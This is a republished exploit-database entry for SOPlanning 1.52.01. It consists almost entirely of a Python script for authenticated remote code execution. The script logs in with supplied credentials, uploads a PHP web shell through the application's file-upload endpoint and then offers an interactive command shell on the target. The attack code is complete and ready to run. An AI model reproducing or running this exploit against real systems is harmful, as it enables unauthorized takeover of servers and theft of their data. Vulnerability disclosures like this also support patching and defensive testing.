SOPlanning 1.52.01 (Simple Online Planning Tool) Remote Code Execution (RCE) (Authenticated)
2024-11-18 05:30:26 Author: cxsecurity.com(查看原文) 阅读量:4 收藏

SOPlanning 1.52.01 (Simple Online Planning Tool) Remote Code Execution (RCE) (Authenticated)

# Exploit Title: SOPlanning 1.52.01 (Simple Online Planning Tool) - Remote Code Execution (RCE) (Authenticated) # Date: 6th October, 2024 # Exploit Author: Ardayfio Samuel Nii Aryee # Version: 1.52.01 # Tested on: Ubuntu import argparse import requests import random import string import urllib.parse def command_shell(exploit_url): commands = input("soplaning:~$ ") encoded_command = urllib.parse.quote_plus(commands) command_res = requests.get(f"{exploit_url}?cmd={encoded_command}") if command_res.status_code == 200: print(f"{command_res.text}") return print(f"Error: An erros occured while running command: {encoded_command}") def exploit(username, password, url): target_url = f"{url}/process/login.php" upload_url = f"{url}/process/upload.php" link_id = ''.join(random.choices(string.ascii_lowercase + string.digits, k=6)) php_filename = f"{''.join(random.choices(string.ascii_lowercase + string.digits, k=3))}.php" login_data = {"login":username,"password":password} res = requests.post(target_url, data=login_data, allow_redirects=False) cookies = res.cookies multipart_form_data = { "linkid": link_id, "periodeid": 0, "fichiers": php_filename, "type": "upload" } web_shell = "<?php system($_GET['cmd']); ?>" files = { 'fichier-0': (php_filename, web_shell, 'application/x-php') } upload_res = requests.post(upload_url, cookies=cookies,files=files, data=multipart_form_data) if upload_res.status_code == 200 and "File" in upload_res.text: print(f"[+] Uploaded ===> {upload_res.text}") print("[+] Exploit completed.") exploit_url = f"{url}/upload/files/{link_id}/{php_filename}" print(f"Access webshell here: {exploit_url}?cmd=<command>") if "yes" == input("Do you want an interactive shell? (yes/no) "): try: while True: command_shell(exploit_url) except Exception as e: raise(f"Error: {e}") else: pass def main(): parser = argparse.ArgumentParser(prog="SOplanning RCE", \ usage=f"python3 {__file__.split('/')[-1]} -t http://example.com:9090 -u admin -p admin") parser.add_argument("-t", "--target", type=str, help="Target URL (e.g., http://localhost:8080)", required=True) parser.add_argument("-u", "--username",type=str,help="username", required=True) parser.add_argument("-p", "--password",type=str,help="password", required=True) args = parser.parse_args() exploit(args.username, args.password, args.target) main()



 

Thanks for you comment!
Your message is in quarantine 48 hours.

{{ x.nick }}

|

Date:

{{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1


{{ x.comment }}


文章来源: https://cxsecurity.com/issue/WLB-2024110028
如有侵权请联系:admin#unsafe.sh